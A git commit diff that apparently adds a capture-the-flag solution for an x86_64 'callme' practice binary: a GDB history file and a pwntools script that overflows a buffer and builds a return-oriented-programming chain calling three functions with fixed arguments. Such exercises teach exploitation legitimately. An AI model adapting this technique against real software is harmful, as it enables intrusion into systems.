summaryrefslogtreecommitdiff
path: root/x86_64/callme
diff options
context:
space:
mode:
authorBrett Weiland <brett_weiland@bpcspace.com>2020-12-16 17:45:09 -0600
committerBrett Weiland <brett_weiland@bpcspace.com>2020-12-16 17:45:09 -0600
commit3f0a1e64c7e7b410ad5f4e2024cd692536389449 (patch)
tree6474bed612527dd0ca7bc9d2f7096769fd212d14 /x86_64/callme
parent2ddedfeb9199c2ff01b540edf92a4f7d69455c16 (diff)
new file: x86_64/write4/exploit.py
new file: x86_64/write4/useful_gadgets
Diffstat (limited to 'x86_64/callme')
-rw-r--r--x86_64/callme/.gdb_history12
-rwxr-xr-xx86_64/callme/exploit2.py55
2 files changed, 67 insertions, 0 deletions
diff --git a/x86_64/callme/.gdb_history b/x86_64/callme/.gdb_history
new file mode 100644
index 0000000..451f131
--- /dev/null
+++ b/x86_64/callme/.gdb_history
@@ -0,0 +1,12 @@
+break pwnme
+run
+stepi
+return
+stepi
+nexti
+nexti
+q
+break pwnme
+run
+nexti
+quit
diff --git a/x86_64/callme/exploit2.py b/x86_64/callme/exploit2.py
new file mode 100755
index 0000000..b6d228f
--- /dev/null
+++ b/x86_64/callme/exploit2.py
@@ -0,0 +1,55 @@
+#!/usr/bin/env python3
+from pwn import *
+
+usefulGadgets = p64(0x000000000040093c)
+# pop rdi
+# pop rsi
+# pop rdx
+# ret
+
+arg1 = p64(0xdeadbeefdeadbeef)
+arg2 = p64(0xcafebabecafebabe)
+arg3 = p64(0xd00df00dd00df00d)
+
+callme_1_plt = p64(0x0000000000400720)
+callme_2_plt = p64(0x0000000000400740)
+callme_3_plt = p64(0x00000000004006f0)
+
+#jmp qword ptr [rbp]
+#jmp rax
+#jmp qword ptr [rax]
+#pop rbp ; ret
+
+#pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret <- change stack pointer to fin (or some other writable executable part)
+
+
+prog = process('./callme')
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_1_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_2_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_3_plt
+
+
+
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))